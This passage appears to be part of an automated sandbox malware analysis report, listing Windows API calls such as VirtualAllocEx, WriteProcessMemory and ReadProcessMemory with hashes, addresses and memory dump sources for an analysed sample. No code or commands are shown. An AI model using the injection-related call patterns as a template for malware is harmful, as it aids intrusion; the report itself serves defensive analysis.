                                                                • Instruction ID: 07d93664795d8568802f2aafd7d42c7aabd3c898ac3b96575ab8e3f9936b2e69
                                                                • Opcode Fuzzy Hash: 51fbc00a7369d115f3c0b43c78769c4107f592a6ab683dcd9fa3cc5cde5702f9
                                                                • Instruction Fuzzy Hash: 4B515379940309FBEF109F91DC86F9E7B74EB09305F10406AFE04BA282D7B59A64CB59
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 658a831e8231b8fe9ec277e16dbcfc15d3eb29bae609a7a4f122c75e06aec0b2
                                                                • Instruction ID: 1a73ccc5f3e278e69f7928f77a54f04b4ff61f241a9ccba891dd0bd207e65d76
                                                                • Opcode Fuzzy Hash: 658a831e8231b8fe9ec277e16dbcfc15d3eb29bae609a7a4f122c75e06aec0b2
                                                                • Instruction Fuzzy Hash: BC51E230D04A1DE7EB10AF92F8496EDBF34FF48311F524095E18535199CB7A46B5CB1A
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,00000001,00000001,00000000,00000000), ref: 0043CB87
                                                                Strings
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID: 0
                                                                • API String ID: 97706510-4108050209
                                                                • Opcode ID: 38bfafd9b25e7daed97e6aca48eb6b23c67a1a90e5e26b746fde9ad10271d1f1
                                                                • Instruction ID: fd2f8b278a38e6a4af275658ad1f61739299634bdbd29fc41be92767bbc5b4d3
                                                                • Opcode Fuzzy Hash: 38bfafd9b25e7daed97e6aca48eb6b23c67a1a90e5e26b746fde9ad10271d1f1
                                                                • Instruction Fuzzy Hash: FC513DB4A00219EFCB00CF99D9C1A9DBBB0FF0D300F4494A9DA18AB356D374AA50DF65
                                                                APIs
                                                                • lstrcpynW.KERNEL32(00000000,00000000,00000000,?,00462F85,00000000,00000000), ref: 0047E485
                                                                • MessageBoxA.USER32(00000000,00668116,0066810F,00000010), ref: 0047E5E7
                                                                Similarity
                                                                • API ID: Messagelstrcpyn
                                                                • String ID:
                                                                • API String ID: 1775699937-0
                                                                • Opcode ID: df21aab278cbb04d27fa907b7f97a10fbd2f116d6b2d1dc1ee9d6c6ce37535e0
                                                                • Instruction ID: 16b1391e8299dd53bd2d7d5a0ebf85ee054179f9537e2288ec8b5f5bf016012f
                                                                • Opcode Fuzzy Hash: df21aab278cbb04d27fa907b7f97a10fbd2f116d6b2d1dc1ee9d6c6ce37535e0
                                                                • Instruction Fuzzy Hash: EB41ECB0B40305BBEB20AF62DC1AFAA766FE718704F00556BF508A62E1E6794950CB19
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C25C5
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004C2650
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 63d8c54b79e3a959c80a5a1c9d4527704412f2ce2698a230bc490b9839a25c69
                                                                • Instruction ID: 3c8f1dffbc67cf00041211884099194fbcf96f034a663b02cbdf1a9a1368fbf2
                                                                • Opcode Fuzzy Hash: 63d8c54b79e3a959c80a5a1c9d4527704412f2ce2698a230bc490b9839a25c69
                                                                • Instruction Fuzzy Hash: C4417475E00309BBEB509F91DD46FAF7BB4EB04704F104069F904BA281D7F59A209B99
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00001000,00000040,?,?,?,?,?,00481DB3,00000000), ref: 0048229F
                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00481DB3,00000000), ref: 00482318
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID:
                                                                • API String ID: 645232735-0
                                                                • Opcode ID: 68e11efb9f8c11a305d3b42460e2b38ab8c94b3825901ff79547ebd8a4a6f76b
                                                                • Instruction ID: f41b51e50f2018009a9596385a1107b6df17974292cb9961da07fa1d317706ec
                                                                • Opcode Fuzzy Hash: 68e11efb9f8c11a305d3b42460e2b38ab8c94b3825901ff79547ebd8a4a6f76b
                                                                • Instruction Fuzzy Hash: 17217474E00308BBEB50AF55CD46FAE7774EB04705F00405AFE04BB281E3B99A109F59
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000001), ref: 004BA88D
                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 004BA910
                                                                Similarity
                                                                • API ID: MemoryMovelstrlen
                                                                • String ID:
                                                                • API String ID: 456560858-0
                                                                • Opcode ID: 054c4c56d4023e214eedcc387804894c9a03c54a5bfb5671f6e352a52badba1a
                                                                • Instruction ID: 011b154f685295f13d4b9441badd0bc3b1ba36988d1a86af87f99f404607bd26
                                                                • Opcode Fuzzy Hash: 054c4c56d4023e214eedcc387804894c9a03c54a5bfb5671f6e352a52badba1a
                                                                • Instruction Fuzzy Hash: A4215970C0420CEBDF10AF91E84A7EEBF74FB04310F0184A6E5443A295CB794A70DBAA
                                                                APIs
                                                                • GetForegroundWindow.USER32(?,00464250), ref: 0046437A
                                                                • ClientToScreen.USER32(00000000,00000001), ref: 004643CD
                                                                Similarity
                                                                • API ID: ClientForegroundScreenWindow
                                                                • String ID:
                                                                • API String ID: 543591788-0
                                                                • Opcode ID: e45ee86910abd41bdfc1d89e240fce31dc5b7f7231db41bf2d41583dcf24d8ac
                                                                • Instruction ID: f712510772c54deb58c2a5de55252780982022746ddc894640cc6e36fa27784a
                                                                • Opcode Fuzzy Hash: e45ee86910abd41bdfc1d89e240fce31dc5b7f7231db41bf2d41583dcf24d8ac
                                                                • Instruction Fuzzy Hash: AF2142B5E40308FFDF50EF94D8C6B5DBBB4AB09310F10406AE9086B381E7755A909B5A
                                                                APIs
                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 004561E5
                                                                • GetAncestor.USER32(?,00000003), ref: 00456224
                                                                Similarity
                                                                • API ID: AncestorProcessThreadWindow
                                                                • String ID:
                                                                • API String ID: 2900642742-0
                                                                • Opcode ID: 734380954a241558f5e9034685701545407fb38972f378d96d63588a4d3db877
                                                                • Instruction ID: 148ca08dd35ac246e9853eb7a6e137c316f0a848909d7f0a2886ba8a9dfe5684
                                                                • Opcode Fuzzy Hash: 734380954a241558f5e9034685701545407fb38972f378d96d63588a4d3db877
                                                                • Instruction Fuzzy Hash: 4C117070E04208EFDB10DF40D886B69BBB9FB06312F105066F9086F291E3799A55CF5A
                                                                APIs
                                                                • TerminateThread.KERNEL32(?,00000000,0046A7FF,00000000,00000000,?), ref: 0046A82E
                                                                • CloseHandle.KERNEL32(?), ref: 0046A86C
                                                                Similarity
                                                                • API ID: CloseHandleTerminateThread
                                                                • String ID:
                                                                • API String ID: 2476175854-0
                                                                • Opcode ID: 49168673724433fe7236adcc26ab330d660060568315aaa2136e2f3f0f5626d8
                                                                • Instruction ID: f85a4c8148dd4fb7049b348f5d546ae3170ba341ea41641575399b238dcf72c5
                                                                • Opcode Fuzzy Hash: 49168673724433fe7236adcc26ab330d660060568315aaa2136e2f3f0f5626d8
                                                                • Instruction Fuzzy Hash: 8301FB74D44208FBDB00AF50D846BADBB70EB06711F105069E9043B290E3755A61DE9A
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: %fH$%fH
                                                                • API String ID: 0-3971059563
                                                                • Opcode ID: b51ad9ce1e254bcd12eff2096f35fef624322b2d5f7014a3dc0f0e6214de805b
                                                                • Instruction ID: adbfa37a3cf917f8f48eb8d117ba435ef40bc628261ede4735eddb0fd32e3372
                                                                • Opcode Fuzzy Hash: b51ad9ce1e254bcd12eff2096f35fef624322b2d5f7014a3dc0f0e6214de805b
                                                                • Instruction Fuzzy Hash: B9318A75F00304BBEB50BFA59C86F6E77B8DB04304F14446ABA08A7282E6799E509759
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BABB7
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BAC24
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: d694fe8e1ce43fd5ee800c04b13f6ad295183cc8a9c1adc825c0b8ecd9a4b738
                                                                • Instruction ID: 2057915bf783834a909e29b7e8bfa341c42ec8b2bd963eead032e92b7f87cafd
                                                                • Opcode Fuzzy Hash: d694fe8e1ce43fd5ee800c04b13f6ad295183cc8a9c1adc825c0b8ecd9a4b738
                                                                • Instruction Fuzzy Hash: 00310770D0020DEBDF009F91DC86BAEBB71FB08705F004066E6547A291D77A4A70EB9A
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4C5D
                                                                • lstrcmpW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4CB6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 3524194181-0
                                                                • Opcode ID: 97e18850f96655437a34928c7d2a9d311d31ba6d03172602d64ab248539fcac7
                                                                • Instruction ID: 197b9e7e9735eace33b683fda3b3ebfa80cbdcf974b647f2152ea0356185a2d7
                                                                • Opcode Fuzzy Hash: 97e18850f96655437a34928c7d2a9d311d31ba6d03172602d64ab248539fcac7
                                                                • Instruction Fuzzy Hash: 83112A34D40208FBDB506F91DE06BADBB31EF01715F40906AB904391A1D77A4A61AF5A
                                                                APIs
                                                                • lstrcmpiW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4D42
                                                                • lstrcmpW.KERNEL32(?,?,?,00000008,?,00000008), ref: 004C4D9B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcmplstrcmpi
                                                                • String ID:
                                                                • API String ID: 3524194181-0
                                                                • Opcode ID: 904d7cf7ede7f947db5cdd9c14935e915554653ba72e45bd3b40e0933ddf4f98
                                                                • Instruction ID: ca14d7598dd8b3203d88df7484d996b7ca588192da60afbf634b73000eac7a78
                                                                • Opcode Fuzzy Hash: 904d7cf7ede7f947db5cdd9c14935e915554653ba72e45bd3b40e0933ddf4f98
                                                                • Instruction Fuzzy Hash: 1C112A34D80208FBDB60AF91DD06FADBB31EF41711F50806AB50439191D77A4A61AF5A
                                                                APIs
                                                                • RtlMoveMemory.NTDLL(0044CBC7,00000000,00000028), ref: 00452AB5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryMove
                                                                • String ID:
                                                                • API String ID: 1951056069-0
                                                                • Opcode ID: 8e68fb91e7b84e84ba91dd155aedec2eba7f6270f44d8cdfa5a40e5e445ebcf9
                                                                • Instruction ID: f130bc8f3daf23233fe6a1441034e36f74e799423679edd82cba9286e9b9d39d
                                                                • Opcode Fuzzy Hash: 8e68fb91e7b84e84ba91dd155aedec2eba7f6270f44d8cdfa5a40e5e445ebcf9
                                                                • Instruction Fuzzy Hash: 226274B1E40215AFEB40DFA5DCC6F9DB7B4EB0D315F14402AEA04BA382D6756E148B29
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(000003A8,00000000,00000000,00000000,00000000,00000000,004FEE9E,00000000,?,?,?,00000000,00000008,00000000,?), ref: 00474BA9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: c1b8676275f077534766f835ae38481f811d533a99e1c8f17a461168a0cc88e4
                                                                • Instruction ID: 09536dc6592b86cd4257958853dadd12cf47d45e4c0db7be923c644e92f78aa7
                                                                • Opcode Fuzzy Hash: c1b8676275f077534766f835ae38481f811d533a99e1c8f17a461168a0cc88e4
                                                                • Instruction Fuzzy Hash: 7BF16BB0E00208FBEB10DF95ED86BEEBBB9EF48304F14402AF604B6281D7795955CB59
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(000003A8,00000000,00000000,00000000,00000000,00000000,004FEE9E,00000000,?,?,?,00000000,00000008,00000000,?), ref: 004786AC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 3e36fa71d14d125d27c04430d3316d083062530534bd2eede32360b4f4d11794
                                                                • Instruction ID: a6d7b5c5fe38f9d50ead1c175468bdbfbf9e8e303d5d2fa4db6d16fffd05241e
                                                                • Opcode Fuzzy Hash: 3e36fa71d14d125d27c04430d3316d083062530534bd2eede32360b4f4d11794
                                                                • Instruction Fuzzy Hash: A2F14FB1E4020CBBEB00DF95EC89BEEBBB8EF08704F14402AF508BA291D7755955CB59
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000004,00000000), ref: 004831A0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID:
                                                                • API String ID: 95754710-0
                                                                • Opcode ID: a288871662ad259032025310c0ccdc832cf0709ef8aa746028a01125df205660
                                                                • Instruction ID: 082d369041031c277871413530de86cee25f6c986bb4ce4b12ca580ab02ba2bd
                                                                • Opcode Fuzzy Hash: a288871662ad259032025310c0ccdc832cf0709ef8aa746028a01125df205660
                                                                • Instruction Fuzzy Hash: C8E126B0E00219ABDB40EF99DCC6B9DBBB0FB0D304F40446AE604BB396D7B95951CB65
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 00481156
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID:
                                                                • API String ID: 95754710-0
                                                                • Opcode ID: 15c86dc224628a425dc13c868736417fccd121c46bbe5f98210bb436d314f9bf
                                                                • Instruction ID: 740dc97f675e35762054187d4d95d2e1dfd8a28f4b4b68ea2c409bb55c4226ed
                                                                • Opcode Fuzzy Hash: 15c86dc224628a425dc13c868736417fccd121c46bbe5f98210bb436d314f9bf
                                                                • Instruction Fuzzy Hash: 3EE1DEB4E00219AFDB00DF95D8C6A9EBBB4FF0D304F1004AAE605BB362D7766951CB65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0d66f08d375267febf97f0a912acb0c7fb8c5e52a0f85875a41395f4d79b2d71
                                                                • Instruction ID: b92bb4614d61b733a9d247b35fdea048afeeaf1166cfc3d429aa77091c6bf60c
                                                                • Opcode Fuzzy Hash: 0d66f08d375267febf97f0a912acb0c7fb8c5e52a0f85875a41395f4d79b2d71
                                                                • Instruction Fuzzy Hash: 3EB1D130900219EBDF10AFA6DC867EE7B71BF58314F10452AF204752E1D7BA4974DBAA
APIs
  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
• CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 004809A3
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: CallMemoryProcProcessReadWindow
• String ID:
• API String ID: 95754710-0
• Opcode ID: 49e8d14f20b08736df05c92b4cd23643ce200a51b43d6ea8bf44cd5807549bec
• Instruction ID: 6f011f135e5d8a428f56042da7b4c01adbbdea83b38b0f32c898bdaba9ab014e
• Opcode Fuzzy Hash: 49e8d14f20b08736df05c92b4cd23643ce200a51b43d6ea8bf44cd5807549bec
• Instruction Fuzzy Hash: EC9104B4E00219AFDB40DF99D8C6B9EBBB4FB0D304F10046AE604BB352D7755954CB66
APIs
• PathFindFileNameA.SHLWAPI(00000001,?,?,?,?,?,?,?,?,00490764,00000000,00000001), ref: 0049086A
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: FileFindNamePath
• String ID:
• API String ID: 1422272338-0
• Opcode ID: 84d0613788450ac12b89ec697ec6c51b270993614f20196e08a458e3a61f14c2
• Instruction ID: ddbbf336ee54d51a8e4e346dd17e0d56589a0c5badab37533b9b58c953c772ea
• Opcode Fuzzy Hash: 84d0613788450ac12b89ec697ec6c51b270993614f20196e08a458e3a61f14c2
• Instruction Fuzzy Hash: 0A614BB1F00305BFFF10ABA59D86BAF7AB8DB14304F14407AFA44B6282D6799E108759
APIs
• DeviceIoControl.KERNEL32(?,00222014,?,00000018,?,00000008,?,00000000), ref: 0049E640
  • Part of subcall function 004CB120: MessageBoxA.USER32(00000000,00000000,0069258C,?), ref: 004CB343
Memory Dump Source
• Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
Yara matches
Similarity
• API ID: ControlDeviceMessage
• String ID:
• API String ID: 1404884426-0
• Opcode ID: 6d74fd6f1cabd798fdc0abbe88787cef1b671a2be1b2ab4f9e73275870587b2c
• Instruction ID: 0a4a85033bf19e8db2dad349dcb4674adee292d03c2e9feedd84d13c7cd7c192
• Opcode Fuzzy Hash: 6d74fd6f1cabd798fdc0abbe88787cef1b671a2be1b2ab4f9e73275870587b2c
• Instruction Fuzzy Hash: 177165B0E40309EBDF10DFD5DD86BAEBBB4AF08314F20406AE6147B391D7795A108B66
APIs
